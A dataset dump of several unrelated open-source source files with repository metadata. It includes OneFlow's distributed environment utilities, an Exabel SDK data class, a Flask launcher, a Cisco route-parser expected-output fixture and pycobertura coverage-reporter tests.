"Apache-2.0"
] | null | null | null |
python/oneflow/framework/env_util.py
|
mosout/oneflow
|
afbb221d900f1a340568ae2462b2022f8fcc4b3d
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/framework/env_util.py
|
mosout/oneflow
|
afbb221d900f1a340568ae2462b2022f8fcc4b3d
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import socket
import traceback
from contextlib import closing
import oneflow._oneflow_internal
import oneflow.core.control.ctrl_bootstrap_pb2 as ctrl_bootstrap_pb
import oneflow.core.job.env_pb2 as env_pb
import oneflow.core.job.resource_pb2 as resource_util
import oneflow.framework.c_api_util as c_api_util
import oneflow.framework.hob as hob
import oneflow.framework.scope_util as scope_util
import oneflow.framework.session_context as session_ctx
import oneflow.support.enable_if as enable_if
from oneflow import oneflow_deprecate
def api_all_device_placement(device_type: str) -> oneflow._oneflow_internal.placement:
r"""
Return a placement containing all devices of all machines under env.
Args:
device_type (str): cuda or cpu
For examples:
.. code-block:: python
# world_size = 4, node_size = 1
import oneflow as flow
p = flow.env.all_device_placement("cuda") # oneflow.placement(device_type="cuda", machine_device_ids={0 : [0, 1, 2, 3]}, hierarchy=(4,))
p = flow.env.all_device_placement("cpu") # oneflow.placement(device_type="cpu", machine_device_ids={0 : [0, 1, 2, 3]}, hierarchy=(4,))
"""
return oneflow._oneflow_internal.AllDevicePlacement(device_type)
def api_enable_eager_execution(val: bool = True) -> None:
"""If True, job will execute in eager mode, else use lazy mode(static graph).
Args:
val (bool, optional): Whether eager execution or not. Defaults to True.
"""
return enable_if.unique([enable_eager_environment])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.any_global_function_defined)
def enable_eager_environment(val=True):
return oneflow._oneflow_internal.EnableEagerEnvironment(val)
def api_env_init() -> bool:
"""Init environment for job
Returns:
bool: [description]
"""
return enable_if.unique([env_init, do_nothing])()
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def env_init():
global default_env_proto
is_multi_client = oneflow._oneflow_internal.IsMultiClient()
assert len(default_env_proto.machine) > 0
CompleteEnvProto(default_env_proto, is_multi_client)
c_api_util.InitEnv(default_env_proto, is_multi_client)
if not is_multi_client:
if oneflow._oneflow_internal.CurrentMachineId() == 0:
scope_util.InitScopeStack()
else:
exit(0)
return True
def api_machine(*val: list) -> None:
"""Set machines' hostnames.
For instance:
oneflow.env.machine([{"addr": "192.168.1.1"}, {"addr": "192.168.1.2"}])
Args:
val: `list`, `tuple` or multiple arguments of `dict`. First in the list is the master machine.
"""
return enable_if.unique([machine, do_nothing])(*val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def machine(*val):
del default_env_proto.machine[:]
if len(val) == 1 and isinstance(val[0], (list, tuple)):
val = val[0]
default_env_proto.ClearField("machine")
default_env_proto.machine.extend(_MakeMachine(val))
def api_ctrl_port(val: int) -> None:
"""Set port number used to control the execution across multiple machines. Same on every machine.
Args:
val: a port number accessible to peer machines
"""
return enable_if.unique([ctrl_port, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def ctrl_port(val):
assert type(val) is int
default_env_proto.ctrl_port = val
def api_data_port(val: int) -> None:
"""Set port number used to data transfer among multiple machines. Same on every machine.
Args:
val: a port number accessible to peer machines
"""
return enable_if.unique([data_port, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def data_port(val):
assert type(val) is int
default_env_proto.data_port = val
from oneflow import oneflow_deprecate
@oneflow_deprecate()
def api_grpc_use_no_signal(val: bool = True) -> None:
"""Set rpc use signal or not (deprecate)
Args:
val (bool, optional): True or False. Defaults to True.
"""
print(
"WARNING:",
"oneflow.env.grpc_use_no_signal is deprecated, users no longer need to set rpc use signal or not. \n",
traceback.format_stack()[-2],
)
return None
def api_log_dir(val: str) -> None:
"""Specify a dir to store OneFlow's logging files. If not specified, it is `./log` by default.
Args:
val (str): string , log file path
"""
return enable_if.unique([log_dir, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def log_dir(val):
assert type(val) is str
default_env_proto.cpp_logging_conf.log_dir = val
def api_logtostderr(val: int) -> None:
"""Set whether log messages go to stderr instead of logfiles
Args:
val (int): [description]
"""
return enable_if.unique([logtostderr, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def logtostderr(val):
assert type(val) is int
default_env_proto.cpp_logging_conf.logtostderr = val
def api_logbuflevel(val: int) -> None:
"""Log messages at a level <= this flag are buffered.
Log messages at a higher level are flushed immediately.
Args:
val (int): int, number of level
"""
return enable_if.unique([logbuflevel, do_nothing])(val)
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def logbuflevel(val):
assert type(val) is int
default_env_proto.cpp_logging_conf.logbuflevel = val
@enable_if.condition(hob.in_normal_mode & hob.env_initialized)
def do_nothing(*args, **kwargs):
print("Environment has been initialized, this env init will do nothing.")
return False
def CompleteEnvProto(env_proto, is_multi_client):
if is_multi_client:
_UpdateDefaultEnvProtoByMultiClientEnvVars(env_proto)
if env_proto.HasField("ctrl_port") == False:
if len(env_proto.machine) == 1:
env_proto.ctrl_port = _FindFreePort()
else:
raise ValueError(
"a ctrl_port is required if running multi-node, set it with 'oneflow.env.ctrl_port([YOUR PORT])'"
)
def _MakeMachine(machines):
if isinstance(machines, str):
machines = [machines]
rp_machine = env_pb.EnvProto().machine
for m_data in machines:
m = rp_machine.add()
if isinstance(m_data, str):
m.addr = m_data
elif isinstance(m_data, dict):
if "addr" in m_data:
m.addr = m_data["addr"]
if "ctrl_port_agent" in m_data:
m.ctrl_port_agent = m_data["ctrl_port_agent"]
if "data_port_agent" in m_data:
m.data_port_agent = m_data["data_port_agent"]
else:
raise NotImplementedError
id = 0
addrs_for_check = set()
for m in rp_machine:
m.id = id
id += 1
assert m.addr not in addrs_for_check
addrs_for_check.add(m.addr)
return rp_machine
def api_init_bootstrap_confs(*val: list, **kargs) -> None:
return enable_if.unique([MakeBootstrapConfs, do_nothing])(*val, **kargs)
def _MakeBootstrapConf(bootstrap_info: dict):
global config_master_addr
assert config_master_addr.HasField("host"), "must config master host first"
assert config_master_addr.HasField("port"), "must config master port first"
assert config_world_size != 0, "must config world size first"
bootstrap_conf = ctrl_bootstrap_pb.BootstrapConf()
bootstrap_conf.master_addr.CopyFrom(config_master_addr)
bootstrap_conf.world_size = config_world_size
assert "rank" in bootstrap_info
bootstrap_conf.rank = bootstrap_info["rank"]
if "host" in bootstrap_info:
bootstrap_conf.host = bootstrap_info["host"]
global config_bootstrap_ctrl_port
if config_bootstrap_ctrl_port != 0:
bootstrap_conf.ctrl_port = config_bootstrap_ctrl_port
global config_node_size
if config_node_size != 0:
bootstrap_conf.node_size = config_node_size
return bootstrap_conf
@enable_if.condition(hob.in_normal_mode & ~hob.env_initialized)
def MakeBootstrapConfs(
node_list, master_port, world_size=0, ctrl_port=-1, node_size=-1
):
"""Set ctrl_bootstrap_conf' info.
For instance:
ONEFLOW_TEST_NODE_LIST=192.168.1.16,192.168.1.15 ONEFLOW_TEST_MASTER_PORT=43256
ONEFLOW_TEST_WORLD_SIZE=2 ONEFLOW_TEST_RANK_CTRL_PORT=34527
Args:
val: `list`, First in the list is the master machine.
"""
if isinstance(node_list, str):
node_list = [node_list]
global global_ctrl_bootstrap_confs
assert len(global_ctrl_bootstrap_confs) == 0, "ctrl_bootstrap_conf has been inited"
global config_master_addr
config_master_addr.host = node_list[0]
config_master_addr.port = master_port
global config_world_size
if world_size == 0:
config_world_size = len(node_list)
else:
assert world_size % len(node_list) == 0
config_world_size = world_size
global config_bootstrap_ctrl_port
if ctrl_port != -1:
config_bootstrap_ctrl_port = ctrl_port
global config_node_size
if node_size != -1:
config_node_size = node_size
rank = 0
for rank_host in node_list:
assert isinstance(rank_host, str)
bootstrap_conf = _MakeBootstrapConf({"rank": rank, "host": rank_host})
if rank == 0:
global default_env_proto
default_env_proto.ctrl_bootstrap_conf.CopyFrom(bootstrap_conf)
global_ctrl_bootstrap_confs.append(bootstrap_conf)
rank += 1
return global_ctrl_bootstrap_confs
def _DefaultEnvProto():
env_proto = env_pb.EnvProto()
machine = env_proto.machine.add()
machine.id = 0
machine.addr = "127.0.0.1"
return env_proto
def _FindFreePort():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("localhost", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
def HasAllMultiClientEnvVars():
env_var_names = ["MASTER_ADDR", "MASTER_PORT", "WORLD_SIZE", "RANK", "LOCAL_RANK"]
env_var_values = [os.getenv(x) for x in env_var_names]
has_no_env_vars = not any(env_var_values)
has_all_env_vars = all(env_var_values)
assert has_no_env_vars or has_all_env_vars, list(zip(env_var_names, env_var_values))
return has_all_env_vars
def SetDefaultMultiClientEnvVars():
os.environ["MASTER_ADDR"] = "127.0.0.1"
os.environ["MASTER_PORT"] = str(_FindFreePort())
os.environ["WORLD_SIZE"] = "1"
os.environ["RANK"] = "0"
os.environ["LOCAL_RANK"] = "0"
def _UpdateDefaultEnvProtoByMultiClientEnvVars(env_proto):
assert HasAllMultiClientEnvVars()
def str2int(env_config):
assert env_config.isdigit()
return int(env_config)
bootstrap_conf = ctrl_bootstrap_pb.BootstrapConf()
master_addr = ctrl_bootstrap_pb.Address()
master_addr.host = os.getenv("MASTER_ADDR")
master_addr.port = str2int(os.getenv("MASTER_PORT"))
bootstrap_conf.master_addr.CopyFrom(master_addr)
bootstrap_conf.world_size = str2int(os.getenv("WORLD_SIZE"))
bootstrap_conf.rank = str2int(os.getenv("RANK"))
env_proto.ctrl_bootstrap_conf.CopyFrom(bootstrap_conf)
cpp_logging_conf = env_pb.CppLoggingConf()
if os.getenv("GLOG_log_dir"):
cpp_logging_conf.log_dir = os.getenv("GLOG_log_dir")
if os.getenv("GLOG_logtostderr"):
cpp_logging_conf.logtostderr = int(os.getenv("GLOG_logtostderr"))
if os.getenv("GLOG_logbuflevel"):
cpp_logging_conf.logbuflevel = os.getenv("GLOG_logbuflevel")
env_proto.cpp_logging_conf.CopyFrom(cpp_logging_conf)
device_tag2default_parallel_conf = {}
default_env_proto = _DefaultEnvProto()
config_master_addr = ctrl_bootstrap_pb.Address()
config_world_size = 0
config_bootstrap_ctrl_port = 0
config_node_size = 0
global_ctrl_bootstrap_confs = []
| 32.658915
| 144
| 0.708205
|
3a0f3fa52e98156407557cebe9bd163c630c5e3c
| 3,851
|
py
|
Python
|
exabel_data_sdk/client/api/data_classes/relationship_type.py
|
burk/python-sdk
|
83fb81d09e0d6a407c8907a75bebb895decc7edc
|
[
"MIT"
] | null | null | null |
exabel_data_sdk/client/api/data_classes/relationship_type.py
|
burk/python-sdk
|
83fb81d09e0d6a407c8907a75bebb895decc7edc
|
[
"MIT"
] | null | null | null |
exabel_data_sdk/client/api/data_classes/relationship_type.py
|
burk/python-sdk
|
83fb81d09e0d6a407c8907a75bebb895decc7edc
|
[
"MIT"
] | null | null | null |
from typing import Mapping, Union
from exabel_data_sdk.client.api.proto_utils import from_struct, to_struct
from exabel_data_sdk.stubs.exabel.api.data.v1.all_pb2 import (
RelationshipType as ProtoRelationshipType,
)
class RelationshipType:
"""
A relationship type resource in the Data API.
Attributes:
name (str): The resource name of the relationship type, for example
"relationshipTypes/namespace.relationshipTypeIdentifier".
The namespace must be empty (being global) or one of the
predetermined namespaces the customer has access to. The
relationship type identifier must match the regex
[A-Z][A-Z0-9_]{0,63}.
description (str): One or more paragraphs of text description.
properties (dict): The properties of this entity.
read_only (bool): Whether this resource is read only.
is_ownership (bool): Whether this relationship type is a data set ownership.
"""
def __init__(
self,
name: str,
description: str = "",
properties: Mapping[str, Union[str, bool, int, float]] = None,
read_only: bool = False,
is_ownership: bool = False,
):
"""
Create a relationship type resource in the Data API.
Args:
name: The resource name of the relationship type, for example
"relationshipTypes/namespace.relationshipTypeIdentifier". The namespace
must be empty (being global) or one of the predetermined namespaces the
customer has access to. The relationship type identifier must match the
regex [A-Z][A-Z0-9_]{0,63}.
description: One or more paragraphs of text description.
properties: The properties of this entity.
read_only: Whether this resource is read only.
read_only: Whether this relationship type is a data set ownership.
"""
self.name = name
self.description = description
self.properties = {} if properties is None else properties
self.read_only = read_only
self.is_ownership = is_ownership
@staticmethod
def from_proto(relationship_type: ProtoRelationshipType) -> "RelationshipType":
"""Create a RelationshipType from the given protobuf RelationshipType."""
return RelationshipType(
name=relationship_type.name,
description=relationship_type.description,
properties=from_struct(relationship_type.properties),
read_only=relationship_type.read_only,
is_ownership=relationship_type.is_ownership,
)
def to_proto(self) -> ProtoRelationshipType:
"""Create a protobuf RelationshipType from this RelationshipType."""
return ProtoRelationshipType(
name=self.name,
description=self.description,
properties=to_struct(self.properties),
is_ownership=self.is_ownership,
)
def __eq__(self, other: object) -> bool:
if not isinstance(other, RelationshipType):
return False
return (
self.name == other.name
and self.description == other.description
and self.properties == other.properties
and self.read_only == other.read_only
and self.is_ownership == other.is_ownership
)
def __repr__(self) -> str:
return (
f"RelationshipType(name='{self.name}', description='{self.description}', "
f"properties={self.properties}, read_only={self.read_only}, "
f"is_ownership={self.is_ownership})"
)
| 42.318681
| 96
| 0.614646
|
a938a75f14c79bb2bf288e3f86f0e49bad42fd67
| 270
|
py
|
Python
|
run.py
|
robot-lab/PetProject
|
377ff1dc18db9d2db3471cece7f8289d782b0db7
|
[
"Apache-2.0"
] | 1
|
2019-07-16T16:16:45.000Z
|
2019-07-16T16:16:45.000Z
|
run.py
|
robot-lab/PetProject
|
377ff1dc18db9d2db3471cece7f8289d782b0db7
|
[
"Apache-2.0"
] | 2
|
2019-07-12T20:57:12.000Z
|
2021-06-01T23:58:04.000Z
|
run.py
|
robot-lab/PetProject
|
377ff1dc18db9d2db3471cece7f8289d782b0db7
|
[
"Apache-2.0"
] | null | null | null |
import os
from backend import create_app
os.environ.setdefault('FLASK_ENV', 'development')
if __name__ == '__main__':
env_name = os.getenv('FLASK_ENV')
port = int(os.getenv('PORT', 8080))
app = create_app(env_name)
app.run(host='0.0.0.0', port=port)
| 20.769231
| 49
| 0.677778
|
9a2adac758499c02456cbf5236c618e24e954505
| 8,327
|
py
|
Python
|
src/genie/libs/parser/nxos/tests/ShowIpRoute/cli/equal/golden_output14_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpRoute/cli/equal/golden_output14_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpRoute/cli/equal/golden_output14_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output ={
"vrf": {
"tn-L2-PBR:vrf-L2-PBR": {
"address_family": {
"ipv4": {
"routes": {
"192.168.1.0/24": {
"route": "192.168.1.0/24",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"direct": True,
"pervasive": True,
"metric": 0,
"route_preference": 1,
"tag": 4294967294,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "10.11.200.98",
"source_protocol": "static",
"best_ucast_nexthop": True,
"updated": "02w00d",
"next_hop_vrf": "overlay-1",
"metric": 0,
"route_preference": 1,
}
}
},
"source_protocol": "static",
},
"192.168.1.1/32": {
"route": "192.168.1.1/32",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"pervasive": True,
"metric": 0,
"route_preference": 0,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "192.168.1.1",
"source_protocol": "local",
"source_protocol_status": "local",
"best_ucast_nexthop": True,
"updated": "02w00d",
"outgoing_interface": "Vlan60",
"metric": 0,
"route_preference": 0,
}
}
},
"source_protocol": "local",
"source_protocol_status": "local",
},
"192.168.100.0/24": {
"route": "192.168.100.0/24",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"direct": True,
"pervasive": True,
"metric": 0,
"route_preference": 1,
"tag": 4294967294,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "10.11.200.98",
"source_protocol": "static",
"best_ucast_nexthop": True,
"updated": "02w00d",
"next_hop_vrf": "overlay-1",
"metric": 0,
"route_preference": 1,
}
}
},
"source_protocol": "static",
},
"192.168.100.1/32": {
"route": "192.168.100.1/32",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"pervasive": True,
"metric": 0,
"route_preference": 0,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "192.168.100.1",
"source_protocol": "local",
"source_protocol_status": "local",
"best_ucast_nexthop": True,
"updated": "02w00d",
"outgoing_interface": "Vlan14",
"metric": 0,
"route_preference": 0,
}
}
},
"source_protocol": "local",
"source_protocol_status": "local",
},
"192.168.254.0/24": {
"route": "192.168.254.0/24",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"direct": True,
"pervasive": True,
"metric": 0,
"route_preference": 1,
"tag": 4294967294,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "10.11.200.98",
"source_protocol": "static",
"best_ucast_nexthop": True,
"updated": "02w00d",
"next_hop_vrf": "overlay-1",
"metric": 0,
"route_preference": 1,
}
}
},
"source_protocol": "static",
},
"192.168.254.1/32": {
"route": "192.168.254.1/32",
"active": True,
"ubest": 1,
"mbest": 0,
"attached": True,
"pervasive": True,
"metric": 0,
"route_preference": 0,
"next_hop": {
"next_hop_list": {
1: {
"index": 1,
"next_hop": "192.168.254.1",
"source_protocol": "local",
"source_protocol_status": "local",
"best_ucast_nexthop": True,
"updated": "02w00d",
"outgoing_interface": "Vlan39",
"metric": 0,
"route_preference": 0,
}
}
},
"source_protocol": "local",
"source_protocol_status": "local",
},
}
}
}
}
}
}
| 47.582857
| 74
| 0.226132
|
7912cba6a5481b4ca966f6cf0ef34473aca18003
| 13,683
|
py
|
Python
|
tests/test_reporters.py
|
kannaiah/pycobertura
|
b5126f2dd4d425f2b83eaa4edf256485b0544559
|
[
"MIT"
] | null | null | null |
tests/test_reporters.py
|
kannaiah/pycobertura
|
b5126f2dd4d425f2b83eaa4edf256485b0544559
|
[
"MIT"
] | 1
|
2021-06-07T13:11:59.000Z
|
2021-06-08T09:54:08.000Z
|
tests/test_reporters.py
|
nilleb/pycobertura
|
25ce699cfb9410d24f8a995b11dce75f64468e75
|
[
"MIT"
] | null | null | null |
from .utils import make_cobertura
def remove_style_tag(html):
style_pattern_start = '\n <style>'
style_pattern_stop = '\n </style>'
style_starts = html.find(style_pattern_start)
style_stops = html.find(style_pattern_stop) + len(style_pattern_stop)
html_nostyle = html[:style_starts] + html[style_stops:]
return html_nostyle
def test_text_report():
from pycobertura.reporters import TextReporter
cobertura = make_cobertura()
report = TextReporter(cobertura)
assert report.generate() == """\
Filename Stmts Miss Cover Missing
------------------------------ ------- ------ ------- ---------
Main.java 11 0 100.00%
search/BinarySearch.java 12 1 91.67% 24
search/ISortedArraySearch.java 0 0 100.00%
search/LinearSearch.java 7 2 71.43% 19-24
TOTAL 30 3 90.00%"""
def test_text_report__with_missing_range():
from pycobertura.reporters import TextReporter
cobertura = make_cobertura('tests/dummy.with-dummy2-no-cov.xml')
report = TextReporter(cobertura)
assert report.generate() == """\
Filename Stmts Miss Cover Missing
----------------- ------- ------ ------- ---------
dummy/__init__.py 0 0 0.00%
dummy/dummy.py 4 0 100.00%
dummy/dummy2.py 2 2 0.00% 1-2
TOTAL 6 2 66.67%"""
def test_text_report_delta__no_diff():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source1/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
---------- ------- ------ ------- ---------
TOTAL - - -"""
def test_text_report_delta__colorize_True():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=True)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - \x1b[32m-2\x1b[39m +40.00% \x1b[32m-5\x1b[39m, \x1b[32m-6\x1b[39m
dummy/dummy2.py +2 \x1b[31m+1\x1b[39m -25.00% \x1b[32m-2\x1b[39m, \x1b[32m-4\x1b[39m, \x1b[31m+5\x1b[39m
dummy/dummy3.py +2 \x1b[31m+2\x1b[39m - \x1b[31m+1\x1b[39m, \x1b[31m+2\x1b[39m
TOTAL +4 \x1b[31m+1\x1b[39m +31.06%"""
def test_text_report_delta__colorize_True__with_missing_range():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=True)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - \x1b[32m-2\x1b[39m +40.00% \x1b[32m-5\x1b[39m, \x1b[32m-6\x1b[39m
dummy/dummy2.py +2 \x1b[31m+1\x1b[39m -25.00% \x1b[32m-2\x1b[39m, \x1b[32m-4\x1b[39m, \x1b[31m+5\x1b[39m
dummy/dummy3.py +2 \x1b[31m+2\x1b[39m - \x1b[31m+1\x1b[39m, \x1b[31m+2\x1b[39m
TOTAL +4 \x1b[31m+1\x1b[39m +31.06%"""
def test_text_report_delta__colorize_False():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, color=False)
assert report_delta.generate() == """\
Filename Stmts Miss Cover Missing
--------------- ------- ------ ------- ----------
dummy/dummy.py - -2 +40.00% -5, -6
dummy/dummy2.py +2 +1 -25.00% -2, -4, +5
dummy/dummy3.py +2 +2 - +1, +2
TOTAL +4 +1 +31.06%"""
def test_html_report():
from pycobertura.reporters import HtmlReporter
cobertura = make_cobertura()
report = HtmlReporter(cobertura)
html_output = report.generate()
assert "normalize.css" in html_output
assert "Skeleton V2.0" in html_output
assert remove_style_tag(html_output) == """\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
<th>Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#Main.java">Main.java</a></td>
<td>11</td>
<td>0</td>
<td>100.00%</td>
<td></td>
</tr>
<tr>
<td><a href="#search/BinarySearch.java">search/BinarySearch.java</a></td>
<td>12</td>
<td>1</td>
<td>91.67%</td>
<td>24</td>
</tr>
<tr>
<td><a href="#search/ISortedArraySearch.java">search/ISortedArraySearch.java</a></td>
<td>0</td>
<td>0</td>
<td>100.00%</td>
<td></td>
</tr>
<tr>
<td><a href="#search/LinearSearch.java">search/LinearSearch.java</a></td>
<td>7</td>
<td>2</td>
<td>71.43%</td>
<td>19-24</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>30</td>
<td>3</td>
<td>90.00%</td>
<td></td>
</tr>
</tfoot>
</table>
<h4 id="Main.java">Main.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/Main.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/BinarySearch.java">search/BinarySearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/BinarySearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/ISortedArraySearch.java">search/ISortedArraySearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/ISortedArraySearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="search/LinearSearch.java">search/LinearSearch.java</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>0
</pre>
</td>
<td class="source">
<pre><span class="noop">tests/search/LinearSearch.java not found</span></pre>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>"""
def test_text_report_delta__no_source():
from pycobertura.reporters import TextReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = TextReporterDelta(cobertura1, cobertura2, show_source=False)
output = report_delta.generate()
assert output == """\
Filename Stmts Miss Cover
--------------- ------- ------ -------
dummy/dummy.py - -2 +40.00%
dummy/dummy2.py +2 +1 -25.00%
dummy/dummy3.py +2 +2 -
TOTAL +4 +1 +31.06%"""
def test_html_report_delta__no_source():
from pycobertura.reporters import HtmlReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = HtmlReporterDelta(cobertura1, cobertura2, show_source=False)
html_output = report_delta.generate()
assert 'Missing' not in html_output
assert '<h4 id=' not in html_output
assert remove_style_tag(html_output) == """\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#dummy/dummy.py">dummy/dummy.py</a></td>
<td>-</td>
<td><span class="green">-2</span></td>
<td>+40.00%</td>
</tr>
<tr>
<td><a href="#dummy/dummy2.py">dummy/dummy2.py</a></td>
<td>+2</td>
<td><span class="red">+1</span></td>
<td>-25.00%</td>
</tr>
<tr>
<td><a href="#dummy/dummy3.py">dummy/dummy3.py</a></td>
<td>+2</td>
<td><span class="red">+2</span></td>
<td>-</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>+4</td>
<td><span class="red">+1</span></td>
<td>+31.06%</td>
</tr>
</tfoot>
</table>
</div>
</body>
</html>"""
def test_html_report_delta():
from pycobertura.reporters import HtmlReporterDelta
cobertura1 = make_cobertura('tests/dummy.source1/coverage.xml')
cobertura2 = make_cobertura('tests/dummy.source2/coverage.xml')
report_delta = HtmlReporterDelta(cobertura1, cobertura2)
html_output = report_delta.generate()
assert '.red {color: red}' in html_output
assert '.green {color: green}' in html_output
assert "normalize.css" in html_output
assert "Skeleton V2.0" in html_output
assert remove_style_tag(html_output) == u"""\
<html>
<head>
<title>pycobertura report</title>
<meta charset="UTF-8">
</head>
<body>
<div class="container">
<table class="u-full-width">
<thead>
<tr>
<th>Filename</th>
<th>Stmts</th>
<th>Miss</th>
<th>Cover</th>
<th>Missing</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="#dummy/dummy.py">dummy/dummy.py</a></td>
<td>-</td>
<td><span class="green">-2</span></td>
<td>+40.00%</td>
<td><span class="green">-5</span>, <span class="green">-6</span>
</td>
</tr>
<tr>
<td><a href="#dummy/dummy2.py">dummy/dummy2.py</a></td>
<td>+2</td>
<td><span class="red">+1</span></td>
<td>-25.00%</td>
<td><span class="green">-2</span>, <span class="green">-4</span>, <span class="red">+5</span>
</td>
</tr>
<tr>
<td><a href="#dummy/dummy3.py">dummy/dummy3.py</a></td>
<td>+2</td>
<td><span class="red">+2</span></td>
<td>-</td>
<td><span class="red">+1</span>, <span class="red">+2</span>
</td>
</tr>
</tbody>
<tfoot>
<tr>
<td>TOTAL</td>
<td>+4</td>
<td><span class="red">+1</span></td>
<td>+31.06%</td>
<td></td>
</tr>
</tfoot>
</table><div class="legend">
<dl>
<dt><code>code</code></dt><dd>coverage unchanged</dd>
<dt class="hit"><code>code</code></dt><dd>coverage increased</dd>
<dt class="miss"><code>code</code></dt><dd>coverage decreased</dd>
<dt><code>+</code></dt><dd>line added or modified</dd>
</dl>
</div>
<h4 id="dummy/dummy.py">dummy/dummy.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>2
3
4
5
6 +
</pre>
</td>
<td class="source">
<pre><span class="noop"> pass
</span><span class="noop">
</span><span class="noop">def bar():
</span><span class="hit"> a = 'a'
</span><span class="hit"> d = 'd'
</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="dummy/dummy2.py">dummy/dummy2.py</h4>
<table class="code u-max-full-width">
<tbody>
<tr>
<td class="lineno">
<pre>1
2 +
3
4 +
5
</pre>
</td>
<td class="source">
<pre><span class="noop">def baz():
</span><span class="hit"> c = 'c'
</span><span class="noop">
</span><span class="hit">def bat():
</span><span class="miss"> pass
</span></pre>
</td>
</tr>
</tbody>
</table>
<h4 id="dummy/dummy3.py">dummy/dummy3.py</h4>
